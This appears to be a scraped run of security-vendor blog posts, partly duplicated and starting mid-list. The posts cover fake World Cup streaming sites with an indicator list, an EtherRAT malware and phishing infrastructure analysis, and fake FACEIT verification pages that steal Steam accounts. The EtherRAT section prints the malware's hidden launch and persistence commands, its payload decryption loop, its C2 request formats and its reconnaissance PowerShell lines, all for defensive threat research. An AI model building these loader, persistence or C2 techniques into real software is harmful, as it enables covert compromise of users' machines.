    • Don’t follow a maze of interactions. If a streaming site opens pop-ups, launches extra tabs, or sends you through endless “click to continue” screens, close it.
    • Never trust warnings or download prompts on these sites. Don’t download anything, install anything, or enter any information.
    • Block ads and trackers in the browser. A tool like Malwarebytes Browser Guard can block the advertising and tracking domains these sites rely on, helping stop pop-ups and redirects before they load.
    • Keep your software up to date. Browser and operating system updates often fix security vulnerabilities that attackers try to exploit.
    • Use up-to-date, real-time anti-malware. If you do click something malicious, products like Malwarebytes Premium can block and remove malware before it causes damage.

    Indicators of compromise (IoCs)

    Domains

    arenaworldcupfootball.xyz
    footballworldcup.xyz
    freeworldcup.xyz
    freeworldcupstream.xyz
    freeworldcupstreaming.xyz
    livestreamingworldcup.xyz
    livestreamworldcup.xyz
    liveworldcup.today
    liveworldcup.xyz
    liveworldcup2026.xyz
    liveworldcupmatch.xyz
    matchoraworldcup.world
    matchworldcup.xyz
    sportivaworldcup.xyz
    sportworldcuponline.xyz
    watchworldcup.watch
    watchworldcup.world
    watchworldcup2026.xyz
    watchworldcupfree.live
    watchworldcupfree.online
    watchworldcupfree.xyz
    worldcup2026match.xyz
    worldcuparena.xyz
    worldcupfoootballmatch.xyz
    worldcupfootball.live
    worldcupfootballmat.live
    worldcupfootballmatch.live
    worldcupfootbmatch.xyz
    worldcupfreeonline.xyz
    worldcuplive.world
    worldcuplivestream.online
    worldcupmatch.online
    worldcupmatch.world
    worldcupmatch.xyz
    worldcupmatchlive.live
    worldcupsoccer.live
    worldcupsoccermatch.live
    worldcupstreameast.online
    worldcupstreameast.xyz
    worldcupusa.world
    worldcupusa.xyz


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    “Free World Cup stream” sites are serving scams, not football

    With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch.

    But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads.

    Here’s how the scam works and how to stay out of it.

    .kb-advanced-slider-423028_956a35-72 .kb-slider-pause-button{color:#fff;background-color:rgba(0, 0, 0, 0.8);border:1px solid transparent;}

      If they’re not real streaming sites, what are they?

      We’ve identified more than 40 websites that are effectively identical. They use different World Cup-themed names, but behind the scenes they’re running the same page template, the same code, and the same advertising infrastructure.

      A script generates a separate page for every match, making the operation cheap to run and easy to scale.

      When a stream appears at all, it’s usually embedded from a third-party piracy service. The real business is the advertising surrounding the player.

      A typical page loads eight or more ad and tracking scripts from the same shady network, plus a handful of other ad domains. The hub the whole page is wired to is a domain we detect as malicious. Your data is the product; the “stream” is the bait.

      Why these sites are dangerous, not just annoying

      It’s tempting to shrug this off as the usual price of free streams. But it’s worse than facing a few annoying ads.

      The real threat is the ad network. This isn’t mainstream, vetted advertising. The kind of ad network we flag as malicious is a common delivery route for the stuff that causes harm: fake virus warnings, bogus software update prompts that install malware, fake prize and verification pages, and forced redirects into subscription traps.

      The video window itself is untrusted. The stream is pulled from a third-party piracy service, not anything the site controls or vets. Pirated stream embeds are a well-known source of their own ads, redirects, and hidden clickable overlays, so even the part that looks like a video player can be working against you.

      There’s nobody behind the counter. These are anonymous, disposable sites built around a major sporting event. There’s no real company, no support, no accountability, and no reason for them to care what lands on your screen.

      It’s the oldest play in the scam handbook: take something millions of people want right now, present it nicely, and monetize the rush. Scammers don’t create the demand, they just stand in front of it with a bucket and collect payment.

      How it works (a quick technical version)

      The first tap is hijacked. A script waits for your first click or tap anywhere on the page and uses it to open an ad in a new tab or window, often in the background. Before you’ve watched a second of football, you’ve already triggered an ad.

      The “Play” button is a maze. Clicking Play doesn’t play anything. Instead, you’re sent through prompts like “Click Resume to continue” before you might reach a video. Every extra step is another click, and each click triggers more ads.

      Invisible ads load. The page quietly loads tiny, invisible 1×1-pixel ads and opens more tabs. These exist purely to generate paid ad views. The tactic has many of the hallmarks of ad fraud, and you’re the unwitting traffic. More ads are injected into the player area the moment you try to watch.

      The stream is an afterthought. Often there’s no working stream at all, so the page loops you through “Streams loading… Retry,” which means more clicks and more ads. Whether you ever see the match or not, the ads have already cashed in.

      What the ads are serving up

      The code fires the ads; but here’s what comes out the other end. On these pages, the injected ads tend to fall into two buckets, and neither has anything to do with football.

      The first is fake message notifications: little pop-ups designed to look like real chat alerts, complete with a stranger’s photo and messages such as “Seen my message yet? Let’s talk!” Some include fake voice messages or explicit thumbnails. They’re made to look like notifications you’ve forgotten to check so you’ll click them.

      The second is crypto bait. These ads promote “play-to-earn” games with promises of daily rewards, surprise drops, massive airdrops, and eye-catching claims like a “124% APY yield engine.”

      One warning sign is the promise of guaranteed triple-digit returns and free money for tapping a button. That’s not how legitimate financial products work.

      That’s the whole machine working end to end: football is the doorway, the malicious advertising network is the engine, and the scams are what it’s actually selling.

      How to watch the World Cup safely

      These “Free HD stream, every match, no catch” sites use football as bait to funnel visitors through a malicious advertising network. Here’s how to stay safe:

      • Use official broadcasters and streaming services. That’s where the legal and safe coverage lives.
      • Treat “every match, free, HD, no signup” as a red flag. Broadcast rights are expensive. If a random website is giving everything away for free, it’s making money some other way.
      • Don’t follow a maze of interactions. If a streaming site opens pop-ups, launches extra tabs, or sends you through endless “click to continue” screens, close it.
      • Never trust warnings or download prompts on these sites. Don’t download anything, install anything, or enter any information.
      • Block ads and trackers in the browser. A tool like Malwarebytes Browser Guard can block the advertising and tracking domains these sites rely on, helping stop pop-ups and redirects before they load.
      • Keep your software up to date. Browser and operating system updates often fix security vulnerabilities that attackers try to exploit.
      • Use up-to-date, real-time anti-malware. If you do click something malicious, products like Malwarebytes Premium can block and remove malware before it causes damage.

      Indicators of compromise (IoCs)

      Domains

      arenaworldcupfootball.xyz
      footballworldcup.xyz
      freeworldcup.xyz
      freeworldcupstream.xyz
      freeworldcupstreaming.xyz
      livestreamingworldcup.xyz
      livestreamworldcup.xyz
      liveworldcup.today
      liveworldcup.xyz
      liveworldcup2026.xyz
      liveworldcupmatch.xyz
      matchoraworldcup.world
      matchworldcup.xyz
      sportivaworldcup.xyz
      sportworldcuponline.xyz
      watchworldcup.watch
      watchworldcup.world
      watchworldcup2026.xyz
      watchworldcupfree.live
      watchworldcupfree.online
      watchworldcupfree.xyz
      worldcup2026match.xyz
      worldcuparena.xyz
      worldcupfoootballmatch.xyz
      worldcupfootball.live
      worldcupfootballmat.live
      worldcupfootballmatch.live
      worldcupfootbmatch.xyz
      worldcupfreeonline.xyz
      worldcuplive.world
      worldcuplivestream.online
      worldcupmatch.online
      worldcupmatch.world
      worldcupmatch.xyz
      worldcupmatchlive.live
      worldcupsoccer.live
      worldcupsoccermatch.live
      worldcupstreameast.online
      worldcupstreameast.xyz
      worldcupusa.world
      worldcupusa.xyz


      Stop threats before they can do any harm.

      Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

      •  

      Inside a malicious infrastructure delivering EtherRAT, phishing pages, and malicious software 

      During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. 

      EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts. 

      An open directory that distributes EtherRAT: where it all began 

      While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder.  The versions have a progressive number, ranging from v1 to v10. 

      Figure 1: Open Directory hosting EtherRAT MSI 
      Open Directory hosting EtherRAT MSI 

      The returned home page caught our attention and prompted us to further explore the campaign. 

      The homepage returned by the EtherRAT distribution website 

      Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain. 

      Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.  Here are some of the home pages we found:

      Some of the malicious websites indexed on Google 

      EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns. 

      Technical analysis of EtherRAT 

      The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on. 

      MSI Loader 

      The MSI file “v9.msi” contains three components: 

      MSI Filename Description 
      KmPuGimn.cmd BAT launcher 
      cDQMlQAru0.xml First Jscript loader 
      MRaQCipBIZeiZNx.log Encrypted EtherRAT 

      When the MSI is executed, the “KmPuGimn.cmd” file is started: 

      conhost --headless cmd /c "KmPuGimn.cmd" 

      This obfuscated BAT file performs different operations: 

      • Extracts the other files in a random folder in %LOCALAPPDATA%. 
      • Re-executes itself via: 
        • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c call “C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWa 
      • Runs the command “where node” to find an existing installation. 
      • Downloads Node.js if it’s not found 
        • Uses “curl -sLo” to download Node.js from the official website. 
        • Extracts to installation directory via “tar -xf”. 
        • Renames extracted directory to “28Q75h”.
      • Loops until both “MRaQCipBIZeiZNx.log” and “cDQMlQAru0.xml” exist, then executes: 
        • conhost.exe –headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml 

      The executed “cDQMlQAru0.xml” is a loader that decrypts the embedded code with a XOR function and then executes it with “vm.compileFunction”. 

      decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF 
      The embedded decrypted code 

      The decrypted code: 

      • Copies node.exe in “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”. 
      • Adds a registry key for persistence with “conhost.exe –headless”. 
      • Decrypts “MRaQCipBIZeiZNx.log” and executes it with “_MJlLlt5.exe” stdin. 

      The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator: 

      for e in range(len(data)): 
          byte = data[e] 
          g = prev 
          prev = byte 
          byte = (byte - g) & 0xff 
          byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff) 
          byte = si[byte] 
          byte = (byte - k[e % len(k)]) & 0xff
          result[e] = byte 

      The final stage is to deploy EtherRAT. EtherRAT allows the attacker to: 

      • Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data. 
      • Get a new C2 server using the Ethereum blockchain. 
      • Reobfuscate itself. 
      • Save the logs to “svchost.log”. 
      Part of decrypted EtherRAT code 

      The EtherRAT uses Ethereum’s “eth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.  

      The blockchain parameters in this case are: 

      • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58 
      • Function selector: 0x7d434425 
      • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0 
      The decoded C2 from Ethereum blockchain 

      The contacted URLs to obtain the C2 server endpoint are: 

      • mainnet[.]gateway[.]tenderly[.]co 
      • rpc[.]flashbots[.]net/fast 
      • rpc[.]mevblocker[.]io 
      • eth-mainnet[.]public[.]blastapi[.]io 
      • ethereum-rpc[.]publicnode[.]com 
      • eth[.]drpc[.]org 
      • eth[.]merkle[.]io 

      Polling requests use randomized URL patterns based on some parameters defined in the code: 

      GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id> 
      X-Bot-Server: <c2_url> 

      In the analyzed sample, the parameters are: 

      • Build ID: “6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
      • ext: randomly selected from “png”, “jpg”, “gif”, “css”, “ico”, “webp”. 
      • param: randomly selected from “id”, “token”, “key”, “b”, “q”, “s”, “v”. 

      After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash. 

      POST /api/[REOBF_PATH]/<victim-uuid> 
      Body: { "code": "<current_script_contents>", "build": "<build_id>" } 

      After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example: 

      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name”
      • reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid 
      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain” 
      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain” 
      • cmd.exe /d /s /c “net session” 
      EtherRAT logs 

      PowerShell Loader 

      The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer: 

      • Downloads Node.js if it’s not present. 
      • Create the necessary directories. 
      • Decode the EtherRAT with a custom decryption algorithm. 
      • Execute Node.js with conhost.exe and the decrypted EtherRAT payload. 

      We detected some variants of the PowerShell loader hosted on these websites; namely that the functions’ names and the decryption functions change in the analyzed PowerShell scripts. 

      The decryption of EtherRAT payload with the custom decryption algorithm 

      Tracking the malicious infrastructure 

      When we analyzed the different websites with the “hacking-theme” pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example: 

      • /zht/sharep-redirect.html 
      • /bl/me.php 
      • /t/teams 
      • /teams/Windows/invite.php 

      It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign. 

      Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a “Bulletproof Infrastructure” service.  

      We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:

      These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages.  Below are some of the phishing pages detected within the malicious infrastructure:

      Misconfigurations exposed the phishing kits 

      While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns. 

      Open directory hosting part of phishing kits

       

      The open directory contained several folders with code and pages related to the phishing campaigns. 

      Phishing kit code 

      Additionally, some domains were misconfigured and allowed the download of “cl.zip”, which contained the source code for the “URL Cloaker” pages. 

      Part of “URL Cloaker” code 

      Indicators of Compromise (IOCs)  

      IPs 

      82[.]165[.]65[.]244: malicious infrastructure  

      185[.]221[.]216[.]121: malicious infrastructure  

      43[.]163[.]233[.]166: malicious infrastructure  

      40[.]160[.]238[.]30: malicious infrastructure  

      159[.]89[.]227[.]204: malicious infrastructure  

      57[.]128[.]31[.]168: malicious infrastructure  

      Domains 

      ivorilla[.]cloud: EtherRAT distribution  

      mx[.]nrlwz[.]com: EtherRAT distribution  

      dn[.]eyqwj[.]com: EtherRAT distribution  

      bi[.]mkrjcsw[.]com: EtherRAT distribution  

      dorqen[.]casa: EtherRAT distribution  

      kelvra[.]club: EtherRAT distribution  

      cambioefectivo[.]com: EtherRAT C2  

      vabelles[.]com: EtherRAT C2  

      tranzed[.]org: EtherRAT C2  

      kibrisarazi[.]com: EtherRAT C2  

      aravisblog[.]com: EtherRAT C2  

      publicspeakingtip[.]org: EtherRAT C2  

      Acknowledgements 


      Stop threats before they can do any harm.

      Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

      •  

      Inside a malicious infrastructure delivering EtherRAT, phishing pages, and malicious software 

      During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. 

      EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts. 

      An open directory that distributes EtherRAT: where it all began 

      While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder.  The versions have a progressive number, ranging from v1 to v10. 

      Figure 1: Open Directory hosting EtherRAT MSI 
      Open Directory hosting EtherRAT MSI 

      The returned home page caught our attention and prompted us to further explore the campaign. 

      The homepage returned by the EtherRAT distribution website 

      Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain. 

      Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.  Here are some of the home pages we found:

      Some of the malicious websites indexed on Google 

      EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns. 

      Technical analysis of EtherRAT 

      The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on. 

      MSI Loader 

      The MSI file “v9.msi” contains three components: 

      MSI Filename Description 
      KmPuGimn.cmd BAT launcher 
      cDQMlQAru0.xml First Jscript loader 
      MRaQCipBIZeiZNx.log Encrypted EtherRAT 

      When the MSI is executed, the “KmPuGimn.cmd” file is started: 

      conhost --headless cmd /c "KmPuGimn.cmd" 

      This obfuscated BAT file performs different operations: 

      • Extracts the other files in a random folder in %LOCALAPPDATA%. 
      • Re-executes itself via: 
        • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c call “C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWa 
      • Runs the command “where node” to find an existing installation. 
      • Downloads Node.js if it’s not found 
        • Uses “curl -sLo” to download Node.js from the official website. 
        • Extracts to installation directory via “tar -xf”. 
        • Renames extracted directory to “28Q75h”.
      • Loops until both “MRaQCipBIZeiZNx.log” and “cDQMlQAru0.xml” exist, then executes: 
        • conhost.exe –headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml 

      The executed “cDQMlQAru0.xml” is a loader that decrypts the embedded code with a XOR function and then executes it with “vm.compileFunction”. 

      decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF 
      The embedded decrypted code 

      The decrypted code: 

      • Copies node.exe in “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”. 
      • Adds a registry key for persistence with “conhost.exe –headless”. 
      • Decrypts “MRaQCipBIZeiZNx.log” and executes it with “_MJlLlt5.exe” stdin. 

      The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator: 

      for e in range(len(data)): 
          byte = data[e] 
          g = prev 
          prev = byte 
          byte = (byte - g) & 0xff 
          byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff) 
          byte = si[byte] 
          byte = (byte - k[e % len(k)]) & 0xff
          result[e] = byte 

      The final stage is to deploy EtherRAT. EtherRAT allows the attacker to: 

      • Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data. 
      • Get a new C2 server using the Ethereum blockchain. 
      • Reobfuscate itself. 
      • Save the logs to “svchost.log”. 
      Part of decrypted EtherRAT code 

      The EtherRAT uses Ethereum’s “eth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.  

      The blockchain parameters in this case are: 

      • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58 
      • Function selector: 0x7d434425 
      • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0 
      The decoded C2 from Ethereum blockchain 

      The contacted URLs to obtain the C2 server endpoint are: 

      • mainnet[.]gateway[.]tenderly[.]co 
      • rpc[.]flashbots[.]net/fast 
      • rpc[.]mevblocker[.]io 
      • eth-mainnet[.]public[.]blastapi[.]io 
      • ethereum-rpc[.]publicnode[.]com 
      • eth[.]drpc[.]org 
      • eth[.]merkle[.]io 

      Polling requests use randomized URL patterns based on some parameters defined in the code: 

      GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id> 
      X-Bot-Server: <c2_url> 

      In the analyzed sample, the parameters are: 

      • Build ID: “6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
      • ext: randomly selected from “png”, “jpg”, “gif”, “css”, “ico”, “webp”. 
      • param: randomly selected from “id”, “token”, “key”, “b”, “q”, “s”, “v”. 

      After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash. 

      POST /api/[REOBF_PATH]/<victim-uuid> 
      Body: { "code": "<current_script_contents>", "build": "<build_id>" } 

      After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example: 

      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name”
      • reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid 
      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain” 
      • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain” 
      • cmd.exe /d /s /c “net session” 
      EtherRAT logs 

      PowerShell Loader 

      The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer: 

      • Downloads Node.js if it’s not present. 
      • Create the necessary directories. 
      • Decode the EtherRAT with a custom decryption algorithm. 
      • Execute Node.js with conhost.exe and the decrypted EtherRAT payload. 

      We detected some variants of the PowerShell loader hosted on these websites; namely that the functions’ names and the decryption functions change in the analyzed PowerShell scripts. 

      The decryption of EtherRAT payload with the custom decryption algorithm 

      Tracking the malicious infrastructure 

      When we analyzed the different websites with the “hacking-theme” pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example: 

      • /zht/sharep-redirect.html 
      • /bl/me.php 
      • /t/teams 
      • /teams/Windows/invite.php 

      It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign. 

      Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a “Bulletproof Infrastructure” service.  

      We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:

      These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages.  Below are some of the phishing pages detected within the malicious infrastructure:

      Misconfigurations exposed the phishing kits 

      While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns. 

      Open directory hosting part of phishing kits

       

      The open directory contained several folders with code and pages related to the phishing campaigns. 

      Phishing kit code 

      Additionally, some domains were misconfigured and allowed the download of “cl.zip”, which contained the source code for the “URL Cloaker” pages. 

      Part of “URL Cloaker” code 

      Indicators of Compromise (IOCs)  

      IPs 

      82[.]165[.]65[.]244: malicious infrastructure  

      185[.]221[.]216[.]121: malicious infrastructure  

      43[.]163[.]233[.]166: malicious infrastructure  

      40[.]160[.]238[.]30: malicious infrastructure  

      159[.]89[.]227[.]204: malicious infrastructure  

      57[.]128[.]31[.]168: malicious infrastructure  

      Domains 

      ivorilla[.]cloud: EtherRAT distribution  

      mx[.]nrlwz[.]com: EtherRAT distribution  

      dn[.]eyqwj[.]com: EtherRAT distribution  

      bi[.]mkrjcsw[.]com: EtherRAT distribution  

      dorqen[.]casa: EtherRAT distribution  

      kelvra[.]club: EtherRAT distribution  

      cambioefectivo[.]com: EtherRAT C2  

      vabelles[.]com: EtherRAT C2  

      tranzed[.]org: EtherRAT C2  

      kibrisarazi[.]com: EtherRAT C2  

      aravisblog[.]com: EtherRAT C2  

      publicspeakingtip[.]org: EtherRAT C2  

      Acknowledgements 


      Stop threats before they can do any harm.

      Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

      •  

      Fake verification pages are stealing Steam accounts from players

      Online gamers should watch out for a convincing scam that aims to steal your Steam account.

      The scam uses fake FACEIT verification pages that look legitimate, complete with official branding, working links, and what appears to be a real Steam login window. By the time it asks for your password, many victims are convinced they’re interacting with a genuine service.

      The goal is to steal your Steam account.

      Why this scam targets FACEIT players

      If you’re not a competitive gamer, FACEIT might not mean anything to you. But to millions of people, it’s a big deal, and that makes it a target for impersonation by cybercriminals.

      FACEIT is one of the largest competitive gaming platforms for Counter-Strike 2 (CS2). Millions of players use it for ranked matches, tournaments, leagues, and advanced anti-cheat protections.

      To use FACEIT, players typically connect their Steam platform accounts, which are valuable for scammers.

      A stolen Steam account can contain:

      • Hundreds or thousands of dollars’ worth of purchased games
      • Valuable CS2 skins and items, some worth significant amounts of real money
      • Wallet funds and saved payment methods
      • Years of friends, messages, and community reputation

      Once criminals gain access, they can steal items, scam friends, or sell the account on criminal marketplaces.

      Because FACEIT connects to Steam, a fake “FACEIT verification” page is an easy way to trick people. Victims think they’re updating their account, but attackers are really trying to steal Steam accounts that may contain valuable games, skins, and wallet funds. Gamers are especially vulnerable because they’re used to linking accounts and following verification steps, and may act quickly if they think their access to a game is at risk.

      How the scam works

      The attack starts with a website that looks like an official FACEIT page. The scam pages are likely distributed through the same channels gamers use every day: community forums, chat servers, social media posts, and direct messages.

      The page claims FACEIT is offering free, optional identity verification to help build a more trusted community. It’s polished, uses the correct branding, and even includes working links to FACEIT’s real blog and support pages. Everything about it is designed to make you think you’re on a genuine FACEIT website, but you’re not.

      Fake FACEIT verification page
      Fake FACEIT verification page

      Instead of using the official faceit.com domain, the scammers use lookalike addresses such as:

      • faceit-discord.com
      • faceit-clubs-verify.com
      • faceit-verification-clubs.com

      The extra words like “verification” or “discord,” are designed to make these addresses look legitimate at a glance, but they’re sites that are controlled by cybercriminals.

      Many of these domains are only days or even hours old. Scammers constantly register new ones, knowing they’ll likely be blocked eventually. That’s why a site not being flagged as dangerous doesn’t mean it’s safe.

      There are small clues, though. In one example, the page listed both “Copyright 2024” and “Copyright 2025.” Legitimate companies rarely make mistakes like that, but scam sites often do.

      After the verification pitch, the page claims there’s a problem with your CS2 account and asks you to update your information to prove you’re not a cheater or using a smurf account.

      Here’s the clever part. The QR code appears blurry and difficult to scan. Researchers believe that’s intentional. After a few failed attempts, many users are likely to give up and click the easier-looking “Sign in through Steam” button instead.

      The broken QR code is the nudge that guides victims toward the part of the page where the real theft happens.

      Fake FACEIT page with a blurry QR code and "Sign in with Steam" button
      Fake FACEIT page with a blurry QR code and “Sign in with Steam” button

      When users eventually give up on the QR code and click the button, a Steam login window appears. It looks convincing, complete with the Steam logo, login fields, and what appears to be a steamcommunity.com address bar.

      But the window is fake.

      Fake Steam sign-in window steals your account details
      Fake Steam sign-in window steals your account details

      Instead of opening a real Steam login page, the scammers display a convincing copy inside the website itself. Security researchers call this a Browser-in-the-Browser attack. The fake window looks and behaves like a genuine browser pop-up, but the address bar is just part of the image.

      Anything entered into the form goes straight to the criminals. If the page also asks for a Steam Guard code, that gets stolen too, allowing attackers to access the account. Some victims are then tricked into “protecting” their items by transferring them to a friend or backup account, when they’re actually sending them directly to the scammers.

      How to protect yourself against this scam

      A few simple habits can stop this scam:

      • Check the real address bar. FACEIT’s official website is faceit.com. Be wary of lookalike domains such as faceit-discord.com or faceit-clubs-verify.com. Remember: a login window inside a webpage can fake its own address bar. Trust the one at the top of your browser, not the one inside the page.
      • Be suspicious of blurry QR codes. Researchers believe the QR code in this scam is deliberately blurred to push users toward the “Sign in through Steam” button instead.
      • Treat urgency as a warning sign. Messages about account problems, verification, or losing access are designed to make you act quickly. Slow down and verify first.
      • Go to the source. If you’re unsure whether FACEIT or Steam needs something from you, open the official website or app yourself rather than following links from Discord, messages, or ads.
      • Add another layer of protection. Scam sites often look legitimate. Malwarebytes Browser Guard can help block known phishing pages and other online scams before you enter your username and password.

      If you already entered your details

      Change your Steam password immediately, make sure Steam Guard is enabled, and sign out of all other devices. Check your Steam API key settings and remove any key you don’t recognize. Change the password anywhere else you reused it and review your account for unauthorized trades or purchases.

      Why this scam works

      This scam works because it doesn’t look like a scam. The branding is convincing, the story makes sense, and even the Steam login window appears legitimate.

      Most people know to check the address bar before entering a password. Browser-in-the-Browser attacks are designed to defeat that habit. Because the fake Steam window is built into the page itself, the criminals can make its address bar say whatever they want, including steamcommunity.com.

      The safest approach is to be suspicious of any login window that appears inside another website. If you’re unsure, close the page and sign in to Steam the way you normally would, through the official app or by typing the address yourself.

      That small pause, that refusal to take the convenient shortcut a page is pushing you toward, is all it takes to keep your account yours.


      Stop threats before they can do any harm.

      Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

      •  

      Fake verification pages are stealing Steam accounts from players

      Online gamers should watch out for a convincing scam that aims to steal your Steam account.

      The scam uses fake FACEIT verification pages that look legitimate, complete with official branding, working links, and what appears to be a real Steam login window. By the time it asks for your password, many victims are convinced they’re interacting with a genuine service.

      The goal is to steal your Steam account.

      Why this scam targets FACEIT players

      If you’re not a competitive gamer, FACEIT might not mean anything to you. But to millions of people, it’s a big deal, and that makes it a target for impersonation by cybercriminals.

      FACEIT is one of the largest competitive gaming platforms for Counter-Strike 2 (CS2). Millions of players use it for ranked matches, tournaments, leagues, and advanced anti-cheat protections.

